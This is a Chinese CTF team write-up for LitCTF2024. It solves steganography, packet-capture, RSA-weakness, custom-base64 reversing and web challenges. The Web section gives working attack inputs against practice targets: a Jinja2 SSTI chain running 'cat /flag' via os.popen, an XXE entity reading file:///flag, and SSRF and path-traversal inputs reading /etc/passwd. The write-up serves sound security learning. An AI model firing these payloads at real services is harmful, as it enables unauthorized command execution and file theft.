首页 > 其他分享 >LitCTF2024-ZongRan战队WriteUp

LitCTF2024-ZongRan战队WriteUp

时间:2024-06-02 19:11:40浏览次数:18  
标签:__ WriteUp ZongRan list flag 战队 857375 print import

ZongRan战队WriteUp

Web+Misc:Muneyoshi

Crypto:chacha

Reverse:laonazaixiuxing

Misc

涐贪恋和伱、甾―⑺dé毎兮毎秒

解题思路:lsb隐写,直接提取

image-20240601090218461

LitCTF{e8f7b267-9c45-4c0e-9d1e-13fc5bcb9bd6}

你说得对,但__

一张二维码扫描一下

image-20240601090420965

发现不对,发现这是原神网页

binwalk提取一下

image-20240601091238895

然后是四张二维码的图,贴心给了顺序

image-20240601091259223

然后拼接一下扫描

image-20240601091311343

image-20240601091359498

盯帧珍珠

题目也说了帧,所以应该gif,010看一下

image-20240601091508140

发现gif文件头,我们改一下后缀

随波逐流分帧

image-20240601091652308

得到flag

image-20240601091703466

LitCTF{You_are_really_staring_at_frames!}

原铁,启动!

image-20240601094114011

第一部分原神

image-20240601094107779

第二部分铁道

image-20240601094643411

flag{good_gamer}

关键,太关键了!

字频统计得到

image-20240601095414867

bingo

然后关键词密码解密CTF在线工具-在线关键字加密|在线关键字解密|关键字密码算法|Keyword Cipher (hiencode.com)

image-20240601171139953

Everywhere We Go

audacity看一下波谱图(早上看了一遍,没放大没找到,哭死)

image-20240601151748901

flag{Calculate_Step_By_Step}

舔到最后应有尽有

看出来是base64,每一段都是,所以不能整个一起解密,其实是base64隐写

网上找到脚本跑[MISC]Base64隐写-CSDN博客

# base64隐写
import base64


def get_diff(s1, s2):
    base64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
    res = 0
    for i in range(len(s2)):
        if s1[i] != s2[i]:
            return abs(base64chars.index(s1[i]) - base64chars.index(s2[i]))
    return res


def b64_stego_decode():
    file = open("LOVE_LETTER.txt", "rb")
    x = ''  # x即bin_str
    lines = file.readlines()
    for line in lines:
        l = str(line, encoding="utf-8")
        stego = l.replace('\n', '')
        # print(stego)
        realtext = base64.b64decode(l)
        # print(realtext)
        realtext = str(base64.b64encode(realtext), encoding="utf-8")
        # print(realtext)
        diff = get_diff(stego, realtext)  # diff为隐写字串与实际字串的二进制差值
        n = stego.count('=')
        if diff:
            x += bin(diff)[2:].zfill(n * 2)
        else:
            x += '0' * n * 2

    i = 0
    flag = ''
    while i < len(x):
        if int(x[i:i + 8], 2):
            flag += chr(int(x[i:i + 8], 2))
        i += 8
    print(flag)


if __name__ == '__main__':
    b64_stego_decode()


image-20240601130245459

The love(随后补的)

010editor打开图片,发现了一个压缩包,以及类似密码的东西

image-20240602183836241

binwalk分离一下这个图片,提取出来一个压缩包,然后archpr去对压缩包掩码攻击

image-20240602184116681

解压一下,得到一个pasword文本以及假的flag文本

然后对password里面的两次base64解密得到一个密码

image-20240602184208947

我们还有个音频,因为wav文件,然后试试deepsound隐写

image-20240602184312104

找到真正的flag

image-20240602184350508

女装照流量(随后补的)

在流量包追踪流,在tcp流28,里面找到一个压缩包一样的东西

image-20240602184538393

我们用binwalk提取出来一个加密的压缩包

我们就是想办法找密码

在tcp流26里面找到image-20240602184812621
然后我们对这个litcft这个话url解码一下,看看搞了个啥(这是之前上传的一句话木马的参数)

然后看这里取值是从第三位开始取值,所以我们base64解码应该从第三位开始

image-20240602185410231

解出来一个这,就发现了这个压缩包的密码

image-20240602185458290

解压一下

image-20240602185540863

Web

SAS - Serializing Authentication System

一个反序列化,我们构造一下

image-20240601104850779

然后base64加密

image-20240601104908761

然后粘贴进去就好了

image-20240601104822749

一个....池子?

这种输入什么,返回什么,一眼SSTI,输入

{{7*7}}

image-20240601113736326

又输入

{{7*'7'}}

image-20240601114744781

确定是Jinja2

{{''.__class__.__mro__[1].__subclasses__()}}

脚本看看os模块在哪,即os._wrap_close(此处我是复制到了浏览器回显的内容,建了一个文本)

image-20240601141313109

开始找全局类

{{''.__class__.__mro__[1].__subclasses__()[138].__init__.__globals__['__builtins__']}}

image-20240601143827336

开始找import这个类,之后就使用这个类去进行命令执行

{{''.__class__.__mro__[1].__subclasses__()[138].__init__.__globals__['__builtins__']['__import__']('os').popen('ls /').read()}}

image-20240601143847380

读取flag

{{''.__class__.__mro__[1].__subclasses__()[138].__init__.__globals__['__builtins__']['__import__']('os').popen('cat /flag').read()}}

image-20240601143917067

exx

这道题也是很熟悉,前几天正好好做到了,在[NCTF2019]Fake XML cookbook做过

而且题目就是xxe

image-20240601134956665

然后xxe注入

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE hack [
<!ENTITY xxe SYSTEM "file:///flag">]>
<user><username>&xxe;</username><password>123</password></user>

image-20240601135050217

浏览器也能套娃?

先试了试百度的,可以访问,应该是ssrf

然后利用file协议

file:///etc/passwd

的确返回了

然后直接查看flag

file:///flag

image-20240601144500221

高亮主题(划掉)背景查看器

开始以为文件包含,实际目录遍历,也暗示了让你点击选择主题

抓包发现

image-20240601145633185

然后我尝试了

theme=../flag.php

发现路径回显了

image-20240601145718542

然后应该就是目录遍历,先找根目录,所以就是试,最后这样

theme=../../../../etc/passwd

image-20240601145902977

然后查看flag

theme=../../../../flag

image-20240601145923337

Crypto

common_primes

共享素数

给了一个e,和多组的n,c。这些n,c还都是一个明文m通过对不同的n进行gcd()算法,求出最大公约数(即p)

求出p了,就能求出q,进而求出d, 解出明文m

from Crypto.Util.number import *
import gmpy2

n1 = 63306931765261881888912008095340470978772999620205174857271016152744820165330787864800482852578992473814976781143226630412780924144266471891939661312715157811674817013479316983665960087664430205713509995750877665395721635625035356901765881750073584848176491668327836527294900831898083545883834181689919776769
n2 = 73890412251808619164803968217212494551414786402702497903464017254263780569629065810640215252722102084753519255771619560056118922616964068426636691565703046691711267156442562144139650728482437040380743352597966331370286795249123105338283013032779352474246753386108510685224781299865560425114568893879804036573
c1 = 11273036722994861938281568979042367628277071611591846129102291159440871997302324919023708593105900105417528793646809809850626919594099479505740175853342947734943586940152981298688146019253712344529086852083823837309492466840942593843720630113494974454498664328412122979195932862028821524725158358036734514252
c2 = 42478690444030101869094906005321968598060849172551382502632480617775125215522908666432583017311390935937075283150967678500354031213909256982757457592610576392121713817693171520657833496635639026791597219755461854281419207606460025156812307819350960182028395013278964809309982264879773316952047848608898562420

p = gmpy2.gcd(n1, n2)
if p == 1:
    exit("n1和n2没有不为1的最大公因子")
q1 = n1 // p
q2 = n2 // p

phi_n1 = (p - 1) * (q1 - 1)
phi_n2 = (p - 1) * (q2 - 1)
e = 65537
d1 = gmpy2.invert(e, phi_n1)
m1 = pow(c1, d1, n1)
print(long_to_bytes(m1))

image-20240601200910936

small_e

小明文攻击

适用情况:e较小,一般为3。 公钥e很小,明文m也不大的话,于是 m^e = k*n + c 中的的k值较小 。从 0 开始穷举k,对每一次 k\*n + c 开e次方,直到得到整数结果,整数结果即为明文

思路:

  1. 遍历c_list中的每个元素c
  2. 对每个c,计算其立方根(c ** (1/3))。
  3. 使用round()函数将立方根的结果四舍五入到最接近的整数。
  4. 使用chr()函数将四舍五入后的整数转换为对应的ASCII字符。
  5. 使用列表推导将上述过程应用于c_list中的每个元素,生成一个新的字符列表。
  6. 使用join()方法将字符列表中的字符连接成一个字符串,并用空字符串''作为连接符。
  7. 将最终得到的字符串赋值给变量flag
from Crypto.Util.number import *

'''
n = 19041138093915757361446596917618836424321232810490087445558083446664894622882726613154205435993358657711781275735559409274819618824173042980556986038895407758062549819608054613307399838408867855623647751322414190174111523595370113664729594420259754806834656490417292174994337683676504327493103018506242963063671315605427867054873507720342850038307517016687659435974562024973531717274759193577450556292821410388268243304996720337394829726453680432751092955575512372582624694709289019402908986429709116441544332327738968785428501665254894444651547623008530708343210644814773933974042816703834571427534684321229977525229
c_list = [438976, 1157625, 1560896, 300763, 592704, 343000, 1860867, 1771561, 1367631, 1601613, 857375, 1225043, 1331000, 1367631, 1685159, 857375, 1295029, 857375, 1030301, 1442897, 1601613, 140608, 1259712, 857375, 970299, 1601613, 941192, 132651, 857375, 1481544, 1367631, 1367631, 1560896, 857375, 110592, 1061208, 857375, 1331000, 1953125]
'''

e=3
c_list = [438976, 1157625, 1560896, 300763, 592704, 343000, 1860867, 1771561, 1367631, 1601613, 857375, 1225043, 1331000, 1367631, 1685159, 857375, 1295029, 857375, 1030301, 1442897, 1601613, 140608, 1259712, 857375, 970299, 1601613, 941192, 132651, 857375, 1481544, 1367631, 1367631, 1560896, 857375, 110592, 1061208, 857375, 1331000, 1953125]
# 解密
flag = ''.join([chr(round(c ** (1/3))) for c in c_list])
print(flag)

image-20240601200852022

CRT

典型的中国剩余定理

设[img](javascript:)是整数m1, m2, ... , mn的乘积,并设[img](javascript:),即[img](javascript:)是除了mi以外的n − 1个整数的乘积。

设[img](javascript:)为[img](javascript:)模[img](javascript:)的数论倒数:[img](javascript:)

方程组的通解形式为:[img](javascript:) 在模[img](javascript:)的意义下,方程组[img](javascript:)只有一个解:[img](javascript:)

from gmpy2 import *
from Crypto.Util.number import *

n_list = [16284549467215459860410219597024063610473673936290355100056351270928590364613988243842136274404316005691228851657707321037165033870804113001550943722154728825877813376691406849932899693973387282799799300076386870984605589385666352824740622229871992727011987847056429850720207816048044538068625281977059392365698031140268787802886018698622326103590834314940280191560618753408741810842189500991556860816195814550884416201667771827582907240044216817705876129993030771943110090291383205720587816820335839616491257078918258839986942101986011761809815192713499542329037877195448381127272183807358011340669666067708631770629, 18874449316683637715798227591079994715220250787784886038879393543606786017564740000007881151950098752600868917271951840433212429335449734520464340460962870875528399394278620757114832553403790578599857545045548782264680469899469733610229824411943119032419052885845035690046611519195843721184869834557481917675133504256150187042147269721516549831707784660343957497462516302534697915170087780048689613921549811073805796084838801677337285061667687328043565589734203160196445644144798845303226939960633632967262794622796927905511547760465906600293964201276584199569541295613430382495278352554280248372584117917520373403063, 13076908038170870040678205430512292701702182383746502395067907294908791921755288520053025319156015431312084703402938465525746196078114225446604200656116848235842943713613538425047483331236843707852400888407037547782069810250229035895403347555287877301409523248658733500963325361631821388259137561613536275954710848967383282290486421290937700396986650186236373076267188846407623991396459884128392118502565707689494271484411270172764553747426536404781904379621870642658609027074757591034785814602602669666257742808888301912575857074138613714693225934811254682687014167022418837710552784925328161453554291397460324648009, 16378397749449315054623854181248970586445531404081850673625192835136416152712968780451149412408644689393643801969477034418829482292894114547339155149570026460766659623960243723741437212596779580161767297321149670682427000047000712397718946486472118638780090056091542235702825736985864963592363421943353726975184567975451918105247987573044010599149673027905021130138957885113596669923366241161695565837122963976988635649640547443201925034845002113548522307980664206158188711548845245115694530280375848933481227411503982144621846732228815377656607983358898296200251680387871097014543693213877074718748683243193584032307, 16561385664507310659703460597815131331175620854125898893505075859155749890511144622913872488783791188180242785479319865960633526830814389031162024199864660323116594980719331106368397062852472114748955889862650270563487466194545102072373606964935390400328607060427961354290055443710114639781630071832997101380097322119243847190066266823291236828718017385537809056374392924015081117151158033309950857254309859691442649968222489177513517837849318096762149934959873646750864750378500351560253453052870424424427631414365680967482680769587570457938750679258205430151223470761518748987038822469422647137405393267829437115661, 27046459277694602448592524332290812177367631061914086306537115904955610821120392893033090428641088790759783810505225125618182431554899875183961418066959811832057748013953098277804562621152445358481976221983179988257658622392669474721482514871569548645762057681213193026792187879687736985533503283192537252904253565317763028483404018596514523171644666753183517320602643087213777450193062371986178076259168860180486748722567326484282893069173271762518110920685267104269429407229859993484209639764440874444582271870147714648808732931399985199947422716048582921727875237459841962093669408116061538502016560235135864203187, 26656304012303785684433399162699704691814095671158676770279115782799819097401667611247727555104978633884125246262630572285699884039990597392442760154412046297340436752418017863089245998557221143069544231044947583991838381529081774245290065442299808728542273138931461712874414662570197142795674160946728850452526786804787060582942714635903943088540232346797109678405554499677459722287119125623191067780196726820726456507802067342186435679967664032334075189916733352409403602499298544374351405005339596410771187606377781063995755795494682971576602822244457151090982442689870155439418641987576796032975032982289138437523, 15430339362720939092241771692575439580654810089653970198317149114896596238037181680990393763581287618371554846982066535980062263001619707606585504112155505335852802431392213092366756058196440934454810685146101829974548748060332228708229146991380736668433937967747468330692411917426038703359064546899782163287526256750039064809093426968389929333819191207284079703677535201724530391246890003928025687520199553868464322185815354591044585221486768114570373992719977614232251764409893171263639718616620216630797031237033969290978218328767317279717825174597882707772846934097838694418308236053838800414834627456689940059791, 18567217334857361786819913577261265078968886790989901098066320191741355103505838160569648197557648144402318678198622602821398215265062903833980611331991924162821902705417905758829862021425828310098183855605162264362860669298956185657733562472361876121183146316333113433547558152618165933865808900552444816088227098441082165477634812598644531670232452276788291537671779564658425789722419032860803991282640262179618723470437500425645011269733791887608702964571393657348573277992781115199432229176320688981128912052074722348557580462855962547978505669490105804175211061178124988260957275350940324541120102820024607088877, 10779265483116424102513175333888918968735912126282080716409998310381429332303237383487628664073567555863832134055945636657550074126628975203541323090803941066893475056319351674995896497450955897099614503220268400135112031310669044989879413178359759130908036871112663414065113664951350386824618325532532761206110118269005313068956882540007289422776225718534047101012876346009269097785027585782628699252006893938086064139042361425306202870627629615292450559291783382487842611805623198422252868756644595549320868144393828052610953995595915294930701560599016888539448223935199483656756326744914184772404419968728372785709]
c_list = [644471004204038587358576160407417490938643306027967868486894032686145771114614076076527690366372762614045209015175209880518279715723521182568975220993976451106760236390912778371250746699463366097164369672789316408520079193370191810477580463635224092686607896863852671881543817329521589324466628227730589108339783619357530316049670209743367574983963078106666377633552745384690084183804939047320711873053569717432670155045869610477526046503868585690544254566603491357805849009447674789480061139157433156989123228768899846183291164697221164452100037658563026884070301188916984245139290761779580443049, 644471004204038587358576160407417490938643306027967868486894032686145771114614076076527690366372762614045209015175209880518279715723521182568975220993976451106760236390912778371250746699463366097164369672789316408520079193370191810477580463635224092686607896863852671881543817329521589324466628227730589108339783619357530316049670209743367574983963078106666377633552745384690084183804939047320711873053569717432670155045869610477526046503868585690544254566603491357805849009447674789480061139157433156989123228768899846183291164697221164452100037658563026884070301188916984245139290761779580443049, 644471004204038587358576160407417490938643306027967868486894032686145771114614076076527690366372762614045209015175209880518279715723521182568975220993976451106760236390912778371250746699463366097164369672789316408520079193370191810477580463635224092686607896863852671881543817329521589324466628227730589108339783619357530316049670209743367574983963078106666377633552745384690084183804939047320711873053569717432670155045869610477526046503868585690544254566603491357805849009447674789480061139157433156989123228768899846183291164697221164452100037658563026884070301188916984245139290761779580443049, 644471004204038587358576160407417490938643306027967868486894032686145771114614076076527690366372762614045209015175209880518279715723521182568975220993976451106760236390912778371250746699463366097164369672789316408520079193370191810477580463635224092686607896863852671881543817329521589324466628227730589108339783619357530316049670209743367574983963078106666377633552745384690084183804939047320711873053569717432670155045869610477526046503868585690544254566603491357805849009447674789480061139157433156989123228768899846183291164697221164452100037658563026884070301188916984245139290761779580443049, 644471004204038587358576160407417490938643306027967868486894032686145771114614076076527690366372762614045209015175209880518279715723521182568975220993976451106760236390912778371250746699463366097164369672789316408520079193370191810477580463635224092686607896863852671881543817329521589324466628227730589108339783619357530316049670209743367574983963078106666377633552745384690084183804939047320711873053569717432670155045869610477526046503868585690544254566603491357805849009447674789480061139157433156989123228768899846183291164697221164452100037658563026884070301188916984245139290761779580443049, 644471004204038587358576160407417490938643306027967868486894032686145771114614076076527690366372762614045209015175209880518279715723521182568975220993976451106760236390912778371250746699463366097164369672789316408520079193370191810477580463635224092686607896863852671881543817329521589324466628227730589108339783619357530316049670209743367574983963078106666377633552745384690084183804939047320711873053569717432670155045869610477526046503868585690544254566603491357805849009447674789480061139157433156989123228768899846183291164697221164452100037658563026884070301188916984245139290761779580443049, 644471004204038587358576160407417490938643306027967868486894032686145771114614076076527690366372762614045209015175209880518279715723521182568975220993976451106760236390912778371250746699463366097164369672789316408520079193370191810477580463635224092686607896863852671881543817329521589324466628227730589108339783619357530316049670209743367574983963078106666377633552745384690084183804939047320711873053569717432670155045869610477526046503868585690544254566603491357805849009447674789480061139157433156989123228768899846183291164697221164452100037658563026884070301188916984245139290761779580443049, 644471004204038587358576160407417490938643306027967868486894032686145771114614076076527690366372762614045209015175209880518279715723521182568975220993976451106760236390912778371250746699463366097164369672789316408520079193370191810477580463635224092686607896863852671881543817329521589324466628227730589108339783619357530316049670209743367574983963078106666377633552745384690084183804939047320711873053569717432670155045869610477526046503868585690544254566603491357805849009447674789480061139157433156989123228768899846183291164697221164452100037658563026884070301188916984245139290761779580443049, 644471004204038587358576160407417490938643306027967868486894032686145771114614076076527690366372762614045209015175209880518279715723521182568975220993976451106760236390912778371250746699463366097164369672789316408520079193370191810477580463635224092686607896863852671881543817329521589324466628227730589108339783619357530316049670209743367574983963078106666377633552745384690084183804939047320711873053569717432670155045869610477526046503868585690544254566603491357805849009447674789480061139157433156989123228768899846183291164697221164452100037658563026884070301188916984245139290761779580443049, 644471004204038587358576160407417490938643306027967868486894032686145771114614076076527690366372762614045209015175209880518279715723521182568975220993976451106760236390912778371250746699463366097164369672789316408520079193370191810477580463635224092686607896863852671881543817329521589324466628227730589108339783619357530316049670209743367574983963078106666377633552745384690084183804939047320711873053569717432670155045869610477526046503868585690544254566603491357805849009447674789480061139157433156989123228768899846183291164697221164452100037658563026884070301188916984245139290761779580443049]


def crt(n_list, c_list):
    n = 1
    for i in n_list:
        n *= i
    N = []  #Mi
    for i in n_list:
        N.append(n // i)   #追加到列尾
    t = []  #ti
    for i in range(len(n_list)):
        t.append(invert(N[i], n_list[i]))   #求逆元

    sum = 0
    for i in range(len(n_list)):
        sum = (sum + c_list[i] * t[i] * N[i]) % n
# c_list[i]即为通解中的a[i]
    return sum

e = 10
M = crt(n_list, c_list)
m = iroot(M, e)[0]
flag = long_to_bytes(m)
print(flag)

image-20240601200617274

Polynomial

解方程+多因子

解方程求出p,q,r

φ(n)=φ(p)φ(q)φ(r)=(p−1)(q−1)(r−1)

from Crypto.Util.number import *
import sympy as sp
import gmpy2


p,q,r=sp.symbols('p q r')

Polynomial1 = 58154360680755769340954893572401748667033313354117942223258370092578635555451803701875246040822675770820625484823955325325376503299610647282074512182673844099014723538935840345806279326671621834884174315042653272845859393720044076731894387316020043030549656441366838837625687203481896972821231596403741150142
Polynomial2 = 171692903673150731426296312524549271861303258108708311216496913475394189393793697817800098242049692305164782587880637516028827647505093628717337292578359337044168928317124830023051015272429945829345733688929892412065424786481363731277240073380880692592385413767327833405744609781605297684139130460468105300760
Polynomial3 = 97986346322515909710602796387982657630408165005623501811821116195049269186902123564611531712164389221482586560334051304898550068155631792198375385506099765648724724155022839470830188199666501947166597094066238209936082936786792764398576045555400742489416583987159603174056183635543796238419852007348207068832
c = 690029769225186609779381701643778761457138553080920444396078012690121613426213828722870549564971078807093600149349998980667982840018011505754141625901220546541212773327617562979660059608220851878701195162259632365509731746682263484332327620436394912873346114451271145412882158989824703847237437871480757404551113620810392782422053869083938928788602100916785471462523020232714027448069442708638323048761035121752395570167604059421559260760645061567883338223699900

eq1= p**2 + q-Polynomial1
eq2= q**2 + r-Polynomial2
eq3= r**2 + p-Polynomial3

sol = sp.solve((eq1 , eq2,eq3), (p, q, r))
# print(sol)

p=7625900647186256736313352208336189136024613525845451962194744676052072325262646533642163553090015734584960267587813894745414843037111074258730819958397631
q=13103163880267648221851617296336865295731278851373488569182099549824826973560296247802058712197255433671825570972129891122274435889696663320490806634737981
r=9898805297737495640281149403465681435952383402115255751446422784763742395898034378399391604085137196351802539935697155137226495010184322468562791581344399
e = 65537
n = p * q * r
d = gmpy2.invert(e, (p - 1) * (q - 1) * (r-1))
m = pow(c, d, n)
print(long_to_bytes(m))

image-20240601200826180

真·EasyRSA

欧拉函数

n=p^4

φ(n)=p4-p3

from Crypto.Util.number import *
import gmpy2
'''
p=getPrime(256)
print(p)
n=p**4
m=bytes_to_long(flag)
e=65537
c=pow(m,e,n)
print(c)
'''

c1= 78995097464505692833175221336110444691706720784642201874318792576886638370795877665241433503242322048462220941850261103929220636367258375223629313880314757819288233877871049903331061261182932603536690216472460424869498053787147893179733302705430645181983825884645791816106080546937178721898460776392249707560
c2= 3784701757181065428915597927276042180461070890549646164035543821266506371502690247347168340234933318004928718562990468281285421981157783991138077081303219
n = 111880903302112599361822243412777826052651261464069603671228695119729911614927471127031113870129416452329155262786735889603893196627646342615137280714187446627292465966881136599942375394018828846001863354234047074224843640145067337664994314496776439054625605421747689126816804916163793264559188427704647589521
c=93492332457019255141294502555555489582661562346262162342211605562996217352449
n1=93492332457019255141294502555555489582661562346262162342211605562996217352449
p = gmpy2.iroot(n,4)[0]
print(p)
e = 65537
phi = p**4-p**3

d = gmpy2.invert(e,phi)
m1 = pow(c1,d,n)

print(long_to_bytes(m1))

运行得到hint

image-20240601181138005

对比p和hint的位数发现只差一位,猜测hint为p,用c2,n,e,p,q进行正常RSA

from Crypto.Util.number import *
import gmpy2

c2= 3784701757181065428915597927276042180461070890549646164035543821266506371502690247347168340234933318004928718562990468281285421981157783991138077081303219
c=93492332457019255141294502555555489582661562346262162342211605562996217352449
n1=93492332457019255141294502555555489582661562346262162342211605562996217352449
p = 102846375519753428570573823986925744957687092615041080268232889119455234034483
q = 93492332457019255141294502555555489582661562346262162342211605562996217352449
e = 65537
phi = (p-1)*(q-1)
n= q * p
d = gmpy2.invert(e,phi)
m1 = pow(c2,d,n)

print(long_to_bytes(m1))

image-20240601181109182

little_fermat

费马分解

p,q是两个素数,而且他俩在素数序列里面就是一前一后的关系。所以他俩的乘积开根号得到的结果一定是在p,q之间的一个数字,(而且一定不是素数,因为p,q就是紧邻的两个素数)。

那我们找这个开方出来的数字的下一个素数,一定是q,因此我们再让n/q就可以得到两个素数。

from Crypto.Util.number import *
from sympy import *
from gmpy2 import *
'''
m = bytes_to_long(flag)
e = 65537
p = getPrime(512)
q = nextprime(p)
n = p * q

x = gen_x(p)

assert pow(666666, x, p) == 1

m = m ^ x
c = pow(m, e, n)

print(f'n = {n}')
print(f'c = {c}')
'''
e = 65537
n = 122719648746679660211272134136414102389555796575857405114496972248651220892565781331814993584484991300852578490929023084395318478514528533234617759712503439058334479192297581245539902950267201362675602085964421659147977335779128546965068649265419736053467523009673037723382969371523663674759921589944204926693
c = 109215817118156917306151535199288935588358410885541150319309172366532983941498151858496142368333375769194040807735053625645757204569614999883828047720427480384683375435683833780686557341909400842874816853528007258975117265789241663068590445878241153205106444357554372566670436865722966668420239234530554168928
sn=isqrt(n)
q=next_prime(sn)
p=n//q
phi=(p-1)*(q-1)
d=invert(e,phi)
m=pow(c,d,n)
print(long_to_bytes(m^p))

Reverse

编码喵

用IDA打开
img

输入的字符串经过 LitCTF_tanji_calculate::Encode[abi:cxx11]((__int64)v16, v21, v12, v11);加密后与"tgL0q1rgEZaZmdm0zwq4lweYzgeTngfHnI1ImMm5ltaXywnLowuYnJmWmx0="进行比较。

进入 LitCTF_tanji_calculate::Encode[abi:cxx11]((__int64)v16, v21, v12, v11);分析应该是base64编码,看看a2也就是编码序列是什么

img

a2=v21=v11=”abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/”

img

到这里,就是自定义的base64解密,直接用工具解密,得出flag
编码喵

标签:__,WriteUp,ZongRan,list,flag,战队,857375,print,import
From: https://www.cnblogs.com/Muneyoshi/p/18227468

相关文章

  • 楚颖i2024polarctf夏季个人挑战赛WriteUp
     PolarCTF网络安全2024夏季个人挑战赛WRITEUP参赛人员:楚颖iPolarCTF网络安全个人挑战赛组委会制目录第一部分:MISC11-1祺贵人告发11-2费眼睛的flag21-5你耳机听什么5第二部分:CRYPTO72-1pici72-2翻栅栏82-3Hello9第三部分:WEB133-2审......
  • 【CTF Web】CTFShow web13 Writeup(RCE+PHP+通配符)
    web131阿呆彻底呆了,阿呆拿起谷姐搜索好久,终于找到更狠的方法。解法可知flag在config.php。<?php#flaginconfig.phpinclude("config.php");if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/system|exec|highlight|cat|\.|......
  • 【CTF Web】CTFShow web9 Writeup(RCE+PHP+代码审计)
    web91阿呆在埃塞俄比亚终于找了一个网管的工作,闲暇时还能种点菜。解法可知flag在config.php。<?php#flaginconfig.phpinclude("config.php");if(isset($_GET['c'])){$c=$_GET['c'];if(preg_match("/system|exec|highlight/i",$c......
  • 【CTF Web】CTFShow web10 Writeup(RCE+PHP+代码审计)
    web101阿呆看见对面二黑急冲冲的跑过来,告诉阿呆出大事了,阿呆问什么事,二黑说:这几天天旱,你菜死了!解法可知flag在config.php。<?php#flaginconfig.phpinclude("config.php");if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/system|......
  • “复兴杯”2023第四届大学生网络安全精英赛排位赛 Writeup
    时间跟全国信安初赛重了(),不过也是第一次在CTFAK了(个人信息个人排名:15解题过程1观察代码,使用科学技术法进行绕过,2.023e3也就是2.023*10^3=2023,弱比较时会化为2023,但是运算时后并不绝对等于2024。输入得到flag。2打开网站可以看到电脑账号是ly,使用过滤器得到包含ly的包,如......
  • ctflearn-writeup(Exclusive Santa)
    https://ctflearn.com/challenge/851在完成这题前最好先下载foremost,unrar,stegsolve等工具首先拿到题目后,先解压得到两个图片文件1.png和3.png两张图片用exiftool,strings,binwalk试过后发现无解于是用关键命令foremost3.png-T(修复破损文件)发现有一个output的文件夹......
  • NewStarCTF 2023 week1 writeup
    NewStarCTF2023week1writeup花了几天时间,终于把week1的题目做完了,还是学到不少东西的,题目质量大多都挺高的,很适合新手入门。Web1.泄漏的秘密url/robots.txt查看robots协议,找到第一部分的flagPARTONE:flag{r0bots_1s_s0_us3fulurl/www.zip查看网站备份,找到第二部分的fla......
  • 阿里云CTF逆向题“欧拉”详细Writeup
    题目来源:阿里云CTF题目类型:逆向题目描述:欧拉欧拉欧拉欧拉![attachment](Euler.exe)题目解析:使用IDA打开,F5,整体先看一遍,100多行,没有混淆先看变量定义这里:charStr1[16];//[rsp+20h][rbp-40h]BYREF__int128v21;//[rsp+30h][rbp-30h]__int128v22;//[rsp+40h][r......
  • 2024第十五届蓝桥杯网络安全赛项部分题目 WriteUp
    2024第十五届蓝桥杯网络安全赛项部分题目WriteUp爬虫协议根据提示,访问/robots.txt,得到敏感路径/38063b612387b10e22f4bd0d71a46a4e/,访问其中的/9de33df789dc91e984a091e6dce2dfb1得到flag。flag{494547b4-f13f-47de-b1a5-a99f20495cd7}packet使用过滤器tcpcontains"fla......
  • [pwn]XYCTF 2024 个人WriteUp
    目录XYCTF2024WriteUp>pwn1.hello_world(签到)2.invisible_flag3.static_link由于本人菜鸡和时间问题,只打了前两周,打出了pwn的三道简单题目,记录自己的做题过程,如何后续复现可能也会更新。XYCTF2024WriteUp>pwn1.hello_world(签到)常规checksecIDA反编译进入主函数发......